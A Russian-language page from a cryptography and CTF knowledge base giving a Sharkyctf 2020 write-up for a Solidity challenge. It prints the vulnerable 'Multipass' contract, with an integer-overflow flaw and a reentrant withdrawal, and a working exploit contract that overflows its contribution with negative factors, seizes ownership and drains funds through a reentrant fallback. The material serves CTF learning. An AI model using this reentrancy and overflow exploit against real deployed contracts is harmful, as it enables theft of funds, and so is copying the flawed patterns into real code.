πŸ“‰
RE & For & Crypto
Crypto
Reverse EngineeringCryptoForensics
Crypto
Reverse EngineeringCryptoForensics
  • Crypto Book
    • Platforms & Playgrounds
    • People and Blogs
  • Π‘ΠΈΠΌΠΌΠ΅Ρ‚Ρ€ΠΈΡ‡Π½ΠΎΠ΅ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅
    • Π‘Π»ΠΎΡ‡Π½Ρ‹Π΅ ΡˆΠΈΡ„Ρ€Ρ‹
      • AES
        • Атаки
          • AES-ECB: Padding Oracle Attacks
          • AES-CBC: Bitflip
          • AES-CBC: Padding Oracle
          • AES-CTR: Fixed nonce
          • AES-CTR: Bitflip
          • AES-CBC: Key=IV insecure
      • DES
    • ΠŸΠΎΡ‚ΠΎΡ‡Π½Ρ‹Π΅ ΡˆΠΈΡ„Ρ€Ρ‹
      • ΠšΠΎΡ€Ρ€Π΅Π»ΡΡ†ΠΈΠΎΠ½Π½Ρ‹ΠΉ Π°Π½Π°Π»ΠΈΠ·
      • Алгоритм БСрлСкэмпа-МСсси восстановлСния Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½Π΅Π³ΠΎ состояния Π›Π Π‘ ΠΏΠΎ Π³Π°ΠΌΠΌΠ΅
    • RNG
      • Mersenne Twister RNG
  • АсиммСтричноС ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅
    • ЭллиптичСскиС ΠΊΡ€ΠΈΠ²Ρ‹Π΅
    • Tools
      • Ѐакторизация чисСл
      • RSATool
    • Diffie-Hellman
    • Атаки Π½Π° RSA
      • ВычислСниС ΠΊΠ²Π°Π΄Ρ€Π°Ρ‚Π½ΠΎΠ³ΠΎ корня ΠΏΠΎ ΠΌΠΎΠ΄ΡƒΠ»ΡŽ
      • Если извСстна Ρ‡Π°ΡΡ‚ΡŒ Π·Π°ΠΊΡ€Ρ‹Ρ‚ΠΎΠΉ экспонСнты ΠΈΠ»ΠΈ экспонСнта ΠΌΠ°Π»Π° (e=3)
      • Π‘Π°Π·ΠΎΠ²Ρ‹Π΅ Π°Ρ‚Π°ΠΊΠΈ
    • Π‘Ρ‚Π°Ρ‚ΡŒΠΈ
  • ΠšΠ»Π°ΡΡΠΈΡ‡Π΅ΡΠΊΠΈΠ΅ ΡˆΠΈΡ„Ρ€Ρ‹
    • Enigma
    • Tools
      • playfair brecker
      • Атаки Π½Π° классичСскиС ΡˆΠΈΡ„Ρ€Ρ‹
      • Поиск слов ΠΏΠΎ ΡˆΠ°Π±Π»ΠΎΠ½Ρƒ
  • Π₯Сш-Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ
    • MAC
      • Attacks
        • SHA1-MAC: Length-Extension Attack
        • HMAC-SHA1: Break with an artificial timing leak β€” ΡƒΡ‚Π΅Ρ‡ΠΊΠΈ Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ
    • KDF
    • Tools
  • Π‘Π»ΠΎΠΊΡ‡Π΅ΠΉΠ½-Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ
    • Script
    • Web3
    • DeFi
    • ZK | Zero Knowledge
    • Etherium Blockchain Contracts
      • About Smart-contracts and Ethereum
      • ERC
      • EVM | Ethereum Virtual Machine
        • Concepts
        • Languages
          • Solidity
          • Yul
          • Viper
          • Rust
      • Development Platforms And Frameworks
        • Truffle
        • Hardhat
        • Brownie
        • Remix IDE
      • Настройка окруТСния (Π½Π° Π±Π°Π·Π΅ Remix IDE)
      • Blockchain Platforms
      • OpenZeppelin
      • CTF examples
        • HoneyPots
        • Sharkyctf2020
        • PHDays10
        • OpenZeppelin Ethernaut
        • List of CTFs
      • Talks & Papers
      • Tools
      • Vulnerabilities
      • Companies
    • API Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Π²Π°Π»ΡŽΡ‚
    • Hyperledger
    • Tools
    • Mixers
  • ΠŸΡ€ΠΈΠΊΠ»Π°Π΄Π½ΠΎΠ΅ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅
    • Π‘Π²ΠΎΠΉ SSL Cert для сайта
    • How Certificate Transparency Works
    • DPAPI
    • OpenSSL
      • Π§Ρ‚Π΅Π½ΠΈΠ΅ сСртификатов ΠΈ ΠΊΠ»ΡŽΡ‡Π΅ΠΉ
  • Learning
    • Certificates
    • Platforms
    • Books & Papers
Powered by GitBook
On this page

Last updated 2 years ago

Sharkyctf 2020 β€” Π±Ρ‹Π» Ρ†Π΅Π»Ρ‹ΠΉ Π½Π°Π±ΠΎΡ€ Π·Π°Π΄Π°Π½ΠΈΠΉ DeFi Π½Π° Solidity ΠΈ Π±Ρ‹Π»ΠΈ Ρ€Π°ΠΉΡ‚Π°ΠΏΡ‹ Π½Π° Π½ΠΈΡ… Π² Ρ€Π°Π·Π΄Π΅Π»Π΅ blockchain.

Writeup:

Π€ΠΈΡˆΠ΅Ρ‡ΠΊΠΈ:

  • На etherscan Π²ΠΈΠ΄Π½Ρ‹ всС измСнСния ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΎΠ² ΠΊΠΎΠ½Ρ‚Ρ€Π°ΠΊΡ‚Π° (замСняСм Π½Π° свой ΠΊΠΎΠ½Ρ‚Ρ€Π°ΠΊΡ‚)

ΠŸΡ€ΠΈΠΌΠ΅Ρ€ эксплоита Π½Π° Solidity:

ΠŸΡƒΡΡ‚ΡŒ Π΅ΡΡ‚ΡŒ ΠΊΠΎΠ½Ρ‚Ρ€Π°ΠΊΡ‚ (ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±ΡƒΠ΄Π΅ΠΌ Π°Ρ‚Π°ΠΊΠΎΠ²Π°Ρ‚ΡŒ)

И этот ΠΊΠΎΠ½Ρ‚Ρ€Π°ΠΊΡ‚ располоТСн ΠΏΠΎ адрСсу: 0x693282455c051D6CB3B138fD78474c8D9F7c8AFa

Π’ΠΎΠ³Π΄Π° эксплоит Π±ΡƒΠ΄Π΅Ρ‚ Π²Ρ‹Π³Π»ΡΠ΄Π΅Ρ‚ΡŒ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ (ΠžΠ±Ρ€Π°Ρ‚ΠΈ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅, Ρ‡Ρ‚ΠΎ Ρ‡ΡƒΠΆΠΎΠΉ ΠΊΠΎΠ½Ρ‚Ρ€Π°ΠΊΡ‚ инициализируСтся Ρ‡Π΅Ρ€Π΅Π· адрСс):

https://imagin.vip/?p=1380#Warmup
https://ropsten.etherscan.io/tx/0x112db25adf343310ab34a8210532c513cd5c6e309b368c19f577c590a0149d23#statechange
pragma solidity = 0.4.25;
 
contract Multipass {
    address public owner;
    uint256 public money;
     
    mapping(address => int256) public contributions;
     
    bool public withdrawn;
     
    constructor() public payable {
        contributions[msg.sender] = int256(msg.value * 900000000000000000000);
        owner = msg.sender;
        money = msg.value;
        withdrawn = false;
    }
     
    function gift() public payable {
        require(contributions[msg.sender] == 0 && msg.value == 0.00005 ether);
        contributions[msg.sender] = int256(msg.value) * 10;
        money += msg.value;
    }
   
    function takeSomeMoney() public {
        require(msg.sender == owner && withdrawn == false);
        uint256 someMoney = money/20;
        if(msg.sender.call.value(someMoney)()){
            money -= someMoney;
        }
        withdrawn = true;
    }
     
    function contribute(int256 _factor) public {
        require(contributions[msg.sender] != 0 && _factor < 10);
        contributions[msg.sender] *= _factor;
    }
     
    function claimContract() public {
        require(contributions[msg.sender] > contributions[owner]);
        owner = msg.sender;
    }
}
pragma solidity = 0.4.25;

import "./multipass.sol";

contract exp{
    Multipass x;
    constructor(){
        x = Multipass(0x693282455c051D6CB3B138fD78474c8D9F7c8AFa);
    }
     
    function prepare() public payable{
        x.gift.value(0.00005 ether)();
        // you need invoke this function twice
        x.contribute(-100000000000);
        x.contribute(-100000000000);
        // x.contribute(2);
    }
     
    function Claim(){
        x.claimContract();
    }
     
    function reEntry(){
        x.takeSomeMoney();
    }
     
    function() public payable{
        x.takeSomeMoney();
    }
     
     
}
PreviousHoneyPotsNextPHDays10
  1. Π‘Π»ΠΎΠΊΡ‡Π΅ΠΉΠ½-Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ
  2. Etherium Blockchain Contracts
  3. CTF examples

Sharkyctf2020